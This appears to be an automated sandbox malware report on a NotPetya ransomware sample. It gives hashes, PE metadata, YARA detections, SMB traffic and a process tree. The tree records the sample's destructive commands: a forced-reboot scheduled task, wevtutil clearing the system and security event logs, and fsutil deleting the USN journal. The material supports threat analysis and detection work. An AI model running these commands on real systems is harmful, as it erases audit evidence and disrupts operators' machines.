                                              SHA-256:4B336C3CC9B6C691FE581077E3DD9EA7DF3BF48F79E35B05CF87E079EC8E0651
                                              SHA-512:E8EBF30488B9475529D3345A00C002FE44336718AF8BC99879018982BBC1172FC77F9FEE12C541BAB9665690092709EF5F847B40201782732C717C331BB77C31
                                              Malicious:true
                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                              Category:modified
                                              Size (bytes):381816
                                              Entropy (8bit):6.566133361341289
                                              Encrypted:false
                                              SSDEEP:6144:xytTHoerLyksdxFPSWaNJaS1I1f4ogQs/LT7Z2Swc0IZCYA+l82:x6TH9F8bPSHDogQsTJJJK+l82
                                              MD5:AEEE996FD3484F28E5CD85FE26B6BDCD
                                              SHA1:CD23B7C9E0EDEF184930BC8E0CA2264F0608BCB3
                                              SHA-256:F8DBABDFA03068130C277CE49C60E35C029FF29D9E3C74C362521F3FB02670D5
                                              SHA-512:E7C0B64CA5933C301F46DC3B3FD095BCC48011D8741896571BF93AF909F54A6B21096D5F66B4900020DCAECE6AB9B0E1D1C65791B8B5943D2E4D5BAB28340E6F
                                              Malicious:false
                                              Yara Hits:
                                              • Rule: JoeSecurity_PsExec, Description: Yara detected PsExec sysinternal tool, Source: C:\Windows\dllhost.dat, Author: Joe Security
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 2%
                                              Joe Sandbox View:
                                               • Filename: 027.dll, Detection: malicious
                                               • Filename: QYXZGHJc38.dll, Detection: malicious
                                               • Filename: NotPetya.exe, Detection: malicious
                                               • Filename: NotPetya DLL.dll.dll, Detection: malicious
                                               • Filename: Trojan.Ransom.exe, Detection: malicious
                                               • Filename: qFTst626iV.dll, Detection: malicious
                                               • Filename: NotPetya.dll, Detection: malicious
                                               • Filename: notpetya.dll, Detection: malicious
                                               • Filename: 6r3kQ7Ddkk.dll, Detection: malicious
                                               • Filename: Xu0Yl0gJER.dll, Detection: malicious
                                               • Filename: 5qoV7TRt2Y.dll, Detection: malicious
                                               • Filename: tvHP8AUd45.dll, Detection: malicious
                                               • Filename: PbrBnW71uv.dll, Detection: malicious
                                               • Filename: rTcWdtStAN.dll, Detection: malicious
                                               • Filename: NotPetya.dll, Detection: malicious
                                               • Filename: 02XuXOatFM.dll, Detection: malicious
                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):5120
                                              Entropy (8bit):0.018426846734561325
                                              Encrypted:false
                                              SSDEEP:3:Ht:N
                                              MD5:F57ED402C9376C48554614180322BAAE
                                              SHA1:AFE4A94BF88758BCE4ACCC6555429EC25F1840D2
                                              SHA-256:A3826A297EEC4463D8472C1A4B7503765BD12C33B69031F014838FA9E6342D23
                                              SHA-512:CC0C5556E57C35D4D09FED4D8B4032047722B0485FA6E81F2585087E6C21E2E58E065543E4EA81138FEF764858BBE53B798CE792EF79525755E96CEFCECC09BF
                                              Malicious:true
                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Entropy (8bit):7.678630793238872
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              • DOS Executable Generic (2002/1) 0.02%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:p2pWin.exe
                                              File size:399'360 bytes
                                              MD5:8c64181ff0dc12c87e443aae94bf6650
                                              SHA1:e91d7ebd17912785caa3e71ef1571dc01b1cd854
                                              SHA256:4c0153b979e65346c1d6f863086082ec5ef103cbf6b0f5e8652d61da678a8ca5
                                              SHA512:4854565b054297dffc13b659a53059ee8731dca02f3027501254551cb4af20b68fb121d03e528151cf910238b49bf00a3827e74e4bb68faf85ebc50d02ad5c17
                                              SSDEEP:12288:ef/X4NTn/xVkNG+w+9OqFoK323qdQYKU3:EXATn/xVkNg+95vdQa
                                              TLSH:BA84026131D38171F0F38A3419DAF7674FBEB4524770918ECB5A561A2D31781AB383A7
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........S..YS..YS..Y<.FYY..Y<.sY[..Y<.GYk..YZ.~YV..YS..Y...Y<.BYR..Y<.wYR..Y<.pYR..YRichS..Y................PE..L.....?\...........
                                              Icon Hash:2775250905472797
                                              Entrypoint:0x40128b
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                              Time Stamp:0x5C3F96B7 [Wed Jan 16 20:40:23 2019 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:5
                                              OS Version Minor:1
                                              File Version Major:5
                                              File Version Minor:1
                                              Subsystem Version Major:5
                                              Subsystem Version Minor:1
                                              Import Hash:ab8fd60b3da01515e6706e8d122c633f
                                              Instruction
                                              call 00007F07C0692784h
                                              jmp 00007F07C069112Eh
                                              mov edi, edi
                                              push ebp
                                              mov ebp, esp
                                              sub esp, 00000328h
                                              mov dword ptr [00461C38h], eax
                                              mov dword ptr [00461C34h], ecx
                                              mov dword ptr [00461C30h], edx
                                              mov dword ptr [00461C2Ch], ebx
                                              mov dword ptr [00461C28h], esi
                                              mov dword ptr [00461C24h], edi
                                              mov word ptr [00461C50h], ss
                                              mov word ptr [00461C44h], cs
                                              mov word ptr [00461C20h], ds
                                              mov word ptr [00461C1Ch], es
                                              mov word ptr [00461C18h], fs
                                              mov word ptr [00461C14h], gs
                                              pushfd
                                              pop dword ptr [00461C48h]
                                              mov eax, dword ptr [ebp+00h]
                                              mov dword ptr [00461C3Ch], eax
                                              mov eax, dword ptr [ebp+04h]
                                              mov dword ptr [00461C40h], eax
                                              lea eax, dword ptr [ebp+08h]
                                              mov dword ptr [00461C4Ch], eax
                                              mov eax, dword ptr [ebp-00000320h]
                                              mov dword ptr [00461B88h], 00010001h
                                              mov eax, dword ptr [00461C40h]
                                              mov dword ptr [00461B3Ch], eax
                                              mov dword ptr [00461B30h], C0000409h
                                              mov dword ptr [00461B34h], 00000001h
                                              mov eax, dword ptr [00461004h]
                                              mov dword ptr [ebp-00000328h], eax
                                              mov eax, dword ptr [00461008h]
                                              mov dword ptr [ebp-00000324h], eax
                                              call dword ptr [00000044h]
                                              Programming Language:
                                              • [C++] VS2010 build 30319
                                              • [ASM] VS2010 build 30319
                                              • [ C ] VS2010 build 30319
                                              • [IMP] VS2008 SP1 build 30729
                                              • [RES] VS2010 build 30319
                                              • [LNK] VS2010 build 30319
                                               Name | Virtual Address | Virtual Size | Is in Section
                                               IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | -
                                               IMAGE_DIRECTORY_ENTRY_IMPORT | 0x6024c | 0x3c | .rdata
                                               IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x63000 | 0xb0c | .rsrc
                                               IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | -
                                               IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | -
                                               IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x64000 | 0x5c4 | .reloc
                                               IMAGE_DIRECTORY_ENTRY_DEBUG | 0x6130 | 0x1c | .rdata
                                               IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
                                               IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
                                               IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | -
                                               IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x5fff0 | 0x40 | .rdata
                                               IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
                                               IMAGE_DIRECTORY_ENTRY_IAT | 0x6000 | 0xfc | .rdata
                                               IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
                                               IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | -
                                               IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -
                                               Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                               .text | 0x1000 | 0x44c2 | 0x4600 | False | 0.616796875 | data | 6.430171910742918 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                               .rdata | 0x6000 | 0x5a810 | 0x5aa00 | False | 0.8549757543103448 | data | 7.762488666147487 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                               .data | 0x61000 | 0x18c0 | 0xc00 | False | 0.21419270833333334 | Matlab v4 mat-file (little endian) \200, sparse, rows 3141592654, columns 1153374641 | 2.4878952701095853 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                               .rsrc | 0x63000 | 0xb0c | 0xc00 | False | 0.5110677083333334 | data | 5.423098345300529 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                               .reloc | 0x64000 | 0xafe | 0xc00 | False | 0.4313151041666667 | data | 4.020063597668279 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                               Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                               RT_ICON | 0x630e8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1152 | English | United States | 0.572202166064982
                                               RT_GROUP_ICON | 0x63990 | 0x14 | data | English | United States | 1.15
                                               RT_MANIFEST | 0x639a4 | 0x165 | ASCII text, with CRLF line terminators | English | United States | 0.5434173669467787
                                               DLL | Import
                                               KERNEL32.dll | GetFullPathNameA, CreateFileA, HeapAlloc, HeapFree, GetProcessHeap, ExpandEnvironmentStringsA, WriteFile, CloseHandle, HeapReAlloc, GetStringTypeW, GetCommandLineA, HeapSetInformation, GetStartupInfoW, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetProcAddress, GetModuleHandleW, ExitProcess, DecodePointer, GetStdHandle, GetModuleFileNameW, GetModuleFileNameA, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, SetHandleCount, InitializeCriticalSectionAndSpinCount, GetFileType, DeleteCriticalSection, EncodePointer, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, GetLastError, InterlockedDecrement, HeapCreate, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, LeaveCriticalSection, EnterCriticalSection, LoadLibraryW, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, Sleep, RtlUnwind, HeapSize, LCMapStringW, MultiByteToWideChar, IsProcessorFeaturePresent
                                               SHELL32.dll | ShellExecuteA
                                               Language of compilation system | Country where language is spoken
                                               English | United States
                                               Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                               Nov 22, 2023 19:12:05.717529058 CET | 49675 | 443 | 192.168.2.4 | 173.222.162.32
                                               Nov 22, 2023 19:12:10.196994066 CET | 49735 | 445 | 192.168.2.4 | 173.222.162.32
                                               Nov 22, 2023 19:12:10.275855064 CET | 49738 | 445 | 192.168.2.4 | 173.222.162.32
                                               Nov 22, 2023 19:12:10.447572947 CET | 49739 | 80 | 192.168.2.4 | 192.168.2.1
                                               Nov 22, 2023 19:12:11.201790094 CET | 49735 | 445 | 192.168.2.4 | 173.222.162.32
                                               Nov 22, 2023 19:12:11.264270067 CET | 49738 | 445 | 192.168.2.4 | 173.222.162.32
                                               Nov 22, 2023 19:12:11.297750950 CET | 49742 | 139 | 192.168.2.4 | 173.222.162.32
                                               Nov 22, 2023 19:12:11.436148882 CET | 49739 | 80 | 192.168.2.4 | 192.168.2.1
                                               Nov 22, 2023 19:12:12.311743975 CET | 49742 | 139 | 192.168.2.4 | 173.222.162.32
                                               Nov 22, 2023 19:12:13.201873064 CET | 49735 | 445 | 192.168.2.4 | 173.222.162.32
                                               Nov 22, 2023 19:12:13.264337063 CET | 49738 | 445 | 192.168.2.4 | 173.222.162.32
                                               Nov 22, 2023 19:12:13.451824903 CET | 49739 | 80 | 192.168.2.4 | 192.168.2.1
                                              TimestampSource PortDest PortSource IPDest IP
                                              Nov 22, 2023 19:12:13.477340937 CET52620274192.168.2.4192.168.2.1
                                              Timestamp | Source IP | Dest IP | Checksum | Code | Type
                                              Nov 22, 2023 19:12:10.447613955 CET | 192.168.2.1 | 192.168.2.4 | 8279 | (Port unreachable) | Destination Unreachable
                                              Nov 22, 2023 19:12:11.436198950 CET | 192.168.2.1 | 192.168.2.4 | 8279 | (Port unreachable) | Destination Unreachable
                                              Nov 22, 2023 19:12:13.451891899 CET | 192.168.2.1 | 192.168.2.4 | 8279 | (Port unreachable) | Destination Unreachable
                                              Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                              Nov 22, 2023 19:12:05.026026964 CET | 1.1.1.1 | 192.168.2.4 | 0x6940 | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net | (none) | CNAME (Canonical name) | IN (0x0001) | false
                                              Nov 22, 2023 19:12:05.026026964 CET | 1.1.1.1 | 192.168.2.4 | 0x6940 | No error (0) | fp2e7a.wpc.phicdn.net | (none) | 192.229.211.108 | A (IP address) | IN (0x0001) | false
                                              Target ID:0
                                              Start time:19:12:07
                                              Start date:22/11/2023
                                              Path:C:\Users\user\Desktop\p2pWin.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\Desktop\p2pWin.exe
                                              Imagebase:0x30000
                                              File size:399'360 bytes
                                              MD5 hash:8C64181FF0DC12C87E443AAE94BF6650
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_NotPetya, Description: Yara detected NotPetya, Source: 00000000.00000000.1627434367.0000000000036000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                              • Rule: fe_cpe_ms17_010_ransomware, Description: probable petya ransomware using eternalblue, wmic, psexec, Source: 00000000.00000000.1627434367.0000000000036000.00000002.00000001.01000000.00000003.sdmp, Author: ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick
                                              • Rule: doublepulsarxor_petya, Description: rule to hit on the xored doublepulsar shellcode, Source: 00000000.00000000.1627434367.0000000000036000.00000002.00000001.01000000.00000003.sdmp, Author: patrick jones
                                              • Rule: doublepulsardllinjection_petya, Description: rule to hit on the xored doublepulsar dll injection shellcode, Source: 00000000.00000000.1627434367.0000000000036000.00000002.00000001.01000000.00000003.sdmp, Author: patrick jones
                                              • Rule: JoeSecurity_NotPetya, Description: Yara detected NotPetya, Source: 00000000.00000001.1627535297.0000000000036000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                              • Rule: fe_cpe_ms17_010_ransomware, Description: probable petya ransomware using eternalblue, wmic, psexec, Source: 00000000.00000001.1627535297.0000000000036000.00000002.00000001.01000000.00000003.sdmp, Author: ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick
                                              • Rule: doublepulsarxor_petya, Description: rule to hit on the xored doublepulsar shellcode, Source: 00000000.00000001.1627535297.0000000000036000.00000002.00000001.01000000.00000003.sdmp, Author: patrick jones
                                              • Rule: doublepulsardllinjection_petya, Description: rule to hit on the xored doublepulsar dll injection shellcode, Source: 00000000.00000001.1627535297.0000000000036000.00000002.00000001.01000000.00000003.sdmp, Author: patrick jones
                                              • Rule: JoeSecurity_NotPetya, Description: Yara detected NotPetya, Source: 00000000.00000002.1631035398.0000000000036000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                              • Rule: fe_cpe_ms17_010_ransomware, Description: probable petya ransomware using eternalblue, wmic, psexec, Source: 00000000.00000002.1631035398.0000000000036000.00000002.00000001.01000000.00000003.sdmp, Author: ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick
                                              • Rule: doublepulsarxor_petya, Description: rule to hit on the xored doublepulsar shellcode, Source: 00000000.00000002.1631035398.0000000000036000.00000002.00000001.01000000.00000003.sdmp, Author: patrick jones
                                              • Rule: doublepulsardllinjection_petya, Description: rule to hit on the xored doublepulsar dll injection shellcode, Source: 00000000.00000002.1631035398.0000000000036000.00000002.00000001.01000000.00000003.sdmp, Author: patrick jones
                                              Reputation:low
                                              Has exited:true

                                              Target ID:1
                                              Start time:19:12:08
                                              Start date:22/11/2023
                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\rundll32.exe" C:\Windows\dllcm.dat #1
                                              Imagebase:0x720000
                                              File size:61'440 bytes
                                              MD5 hash:889B99C52A60DD49227C5E485A016679
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_NotPetya, Description: Yara detected NotPetya, Source: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: fe_cpe_ms17_010_ransomware, Description: probable petya ransomware using eternalblue, wmic, psexec, Source: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp, Author: ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick
                                              • Rule: doublepulsarxor_petya, Description: rule to hit on the xored doublepulsar shellcode, Source: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp, Author: patrick jones
                                              • Rule: doublepulsardllinjection_petya, Description: rule to hit on the xored doublepulsar dll injection shellcode, Source: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp, Author: patrick jones
                                              • Rule: JoeSecurity_NotPetya, Description: Yara detected NotPetya, Source: 00000001.00000002.1670184712.0000000002CCA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: fe_cpe_ms17_010_ransomware, Description: probable petya ransomware using eternalblue, wmic, psexec, Source: 00000001.00000002.1670184712.0000000002CCA000.00000004.00000020.00020000.00000000.sdmp, Author: ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick
                                              • Rule: doublepulsarxor_petya, Description: rule to hit on the xored doublepulsar shellcode, Source: 00000001.00000002.1670184712.0000000002CCA000.00000004.00000020.00020000.00000000.sdmp, Author: patrick jones
                                              • Rule: doublepulsardllinjection_petya, Description: rule to hit on the xored doublepulsar dll injection shellcode, Source: 00000001.00000002.1670184712.0000000002CCA000.00000004.00000020.00020000.00000000.sdmp, Author: patrick jones
                                              Reputation:high
                                              Has exited:false

                                              Target ID:2
                                              Start time:19:12:08
                                              Start date:22/11/2023
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:/c schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 20:15
                                              Imagebase:0x240000
                                              File size:236'544 bytes
                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:3
                                              Start time:19:12:08
                                              Start date:22/11/2023
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:4
                                              Start time:19:12:08
                                              Start date:22/11/2023
                                              Path:C:\Users\user\AppData\Local\Temp\F2CD.tmp
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Users\user\AppData\Local\Temp\F2CD.tmp" \\.\pipe\{0F3B598D-CFC9-40D0-87DB-B9CBE1DF730C}
                                              Imagebase:0x7ff72e900000
                                              File size:56'320 bytes
                                              MD5 hash:7E37AB34ECDCC3E77E24522DDFD4852D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate
                                              Has exited:true

                                              Target ID:5
                                              Start time:19:12:08
                                              Start date:22/11/2023
                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                              Wow64 process (32bit):true
                                              Commandline:schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 20:15
                                              Imagebase:0x180000
                                              File size:187'904 bytes
                                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:6
                                              Start time:19:12:08
                                              Start date:22/11/2023
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:7
                                              Start time:19:12:09
                                              Start date:22/11/2023
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:/c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
                                              Imagebase:0x240000
                                              File size:236'544 bytes
                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:8
                                              Start time:19:12:09
                                              Start date:22/11/2023
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0xf70000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:9
                                              Start time:19:12:09
                                              Start date:22/11/2023
                                              Path:C:\Windows\SysWOW64\wevtutil.exe
                                              Wow64 process (32bit):true
                                              Commandline:wevtutil cl Setup
                                              Imagebase:0x2b0000
                                              File size:208'384 bytes
                                              MD5 hash:3C0E48DA02447863279B0FE3CE7FE5E8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              Target ID:10
                                              Start time:19:12:09
                                              Start date:22/11/2023
                                              Path:C:\Windows\SysWOW64\wevtutil.exe
                                              Wow64 process (32bit):true
                                              Commandline:wevtutil cl System
                                              Imagebase:0x2b0000
                                              File size:208'384 bytes
                                              MD5 hash:3C0E48DA02447863279B0FE3CE7FE5E8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              Target ID:11
                                              Start time:19:12:09
                                              Start date:22/11/2023
                                              Path:C:\Windows\SysWOW64\wevtutil.exe
                                              Wow64 process (32bit):true
                                              Commandline:wevtutil cl Security
                                              Imagebase:0x7ff7699e0000
                                              File size:208'384 bytes
                                              MD5 hash:3C0E48DA02447863279B0FE3CE7FE5E8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              Target ID:12
                                              Start time:19:12:09
                                              Start date:22/11/2023
                                              Path:C:\Windows\SysWOW64\wevtutil.exe
                                              Wow64 process (32bit):true
                                              Commandline:wevtutil cl Application
                                              Imagebase:0x2b0000
                                              File size:208'384 bytes
                                              MD5 hash:3C0E48DA02447863279B0FE3CE7FE5E8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              Target ID:13
                                              Start time:19:12:09
                                              Start date:22/11/2023
                                              Path:C:\Windows\SysWOW64\fsutil.exe
                                              Wow64 process (32bit):true
                                              Commandline:fsutil usn deletejournal /D C:
                                              Imagebase:0xb10000
                                              File size:167'440 bytes
                                              MD5 hash:452CA7574A1B2550CD9FF83DDBE87463
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                                Execution Graph

                                                Execution Coverage:9.8%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:4.2%
                                                Total number of Nodes:952
                                                Total number of Limit Nodes:24
                                                execution_graph 3532 31261 3533 31270 3532->3533 3534 31276 3532->3534 3535 31684 __amsg_exit 62 API calls 3533->3535 3536 3127b __mtinitlocknum 3534->3536 3538 316a9 3534->3538 3535->3534 3539 3152e _doexit 62 API calls 3538->3539 3540 316b4 3539->3540 3540->3536 3541 325e0 3542 32619 3541->3542 3543 3260c 3541->3543 3545 310e6 __call_reportfault 5 API calls 3542->3545 3544 310e6 __call_reportfault 5 API calls 3543->3544 3544->3542 3551 32629 __except_handler4 __IsNonwritableInCurrentImage 3545->3551 3546 326ac 3547 32682 __except_handler4 3547->3546 3548 3269c 3547->3548 3549 310e6 __call_reportfault 5 API calls 3547->3549 3550 310e6 __call_reportfault 5 API calls 3548->3550 3549->3548 3550->3546 3551->3546 3551->3547 3557 342a2 RtlUnwind 3551->3557 3553 326fe __except_handler4 3554 32732 3553->3554 3555 310e6 __call_reportfault 5 API calls 3553->3555 3556 310e6 __call_reportfault 5 API calls 3554->3556 3555->3554 3556->3547 3557->3553 3464 3128b 3467 3276f 3464->3467 3466 31290 3466->3466 3468 327a1 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 3467->3468 3469 32794 3467->3469 3470 32798 3468->3470 3469->3468 3469->3470 3470->3466 3471 3538a IsProcessorFeaturePresent 3472 32f08 3473 33daa __calloc_crt 62 API calls 3472->3473 3474 32f14 EncodePointer 3473->3474 3475 32f2d 3474->3475 3476 3124d 3479 318e4 3476->3479 3480 3221d __getptd_noexit 62 API calls 3479->3480 3481 3125e 3480->3481 3482 3474d 3483 316b8 __amsg_exit 62 API calls 3482->3483 3484 34754 3483->3484 3485 34210 3486 34222 3485->3486 3488 34230 @_EH4_CallFilterFunc@8 3485->3488 3487 310e6 __call_reportfault 5 API calls 3486->3487 3487->3488 3489 35150 RtlUnwind 3562 322b0 3564 322bc __mtinitlocknum 3562->3564 3563 322d4 3565 322e2 3563->3565 3568 33ccc _free 62 API calls 3563->3568 3564->3563 3566 323be __mtinitlocknum 3564->3566 3567 33ccc _free 62 API calls 3564->3567 3569 322f0 3565->3569 3570 
33ccc _free 62 API calls 3565->3570 3567->3563 3568->3565 3571 322fe 3569->3571 3572 33ccc _free 62 API calls 3569->3572 3570->3569 3573 3230c 3571->3573 3575 33ccc _free 62 API calls 3571->3575 3572->3571 3574 3231a 3573->3574 3576 33ccc _free 62 API calls 3573->3576 3577 32328 3574->3577 3578 33ccc _free 62 API calls 3574->3578 3575->3573 3576->3574 3579 32339 3577->3579 3580 33ccc _free 62 API calls 3577->3580 3578->3577 3581 329d6 __lock 62 API calls 3579->3581 3580->3579 3582 32341 3581->3582 3583 32366 3582->3583 3584 3234d InterlockedDecrement 3582->3584 3598 323ca 3583->3598 3584->3583 3586 32358 3584->3586 3586->3583 3588 33ccc _free 62 API calls 3586->3588 3588->3583 3589 329d6 __lock 62 API calls 3590 3237a 3589->3590 3591 323ab 3590->3591 3593 33ed3 ___removelocaleref 8 API calls 3590->3593 3601 323d6 3591->3601 3596 3238f 3593->3596 3595 33ccc _free 62 API calls 3595->3566 3596->3591 3597 33f6c ___freetlocinfo 62 API calls 3596->3597 3597->3591 3604 328fd LeaveCriticalSection 3598->3604 3600 32373 3600->3589 3605 328fd LeaveCriticalSection 3601->3605 3603 323b8 3603->3595 3604->3600 3605->3603 3490 3139b 3491 313d7 3490->3491 3492 313ad 3490->3492 3492->3491 3494 32812 3492->3494 3495 3281e __mtinitlocknum 3494->3495 3496 32296 __getptd 62 API calls 3495->3496 3498 32823 3496->3498 3500 342d2 3498->3500 3499 32845 __mtinitlocknum 3499->3491 3501 342d7 _abort 3500->3501 3502 342e2 3501->3502 3508 32a6b 3501->3508 3504 342fa 3502->3504 3505 32c3b __call_reportfault 8 API calls 3502->3505 3506 31684 __amsg_exit 62 API calls 3504->3506 3505->3504 3507 34304 3506->3507 3507->3499 3510 32a77 __mtinitlocknum 3508->3510 3509 32ad2 3513 32ae1 3509->3513 3515 32aa3 _siglookup 3509->3515 3510->3509 3511 32a9e 3510->3511 3510->3513 3510->3515 3512 3221d __getptd_noexit 62 API calls 3511->3512 3512->3515 3514 32e3f _malloc 62 API calls 3513->3514 3516 32ae6 3514->3516 3518 32b3e 3515->3518 3519 31684 __amsg_exit 62 API calls 3515->3519 3525 32aac __mtinitlocknum 
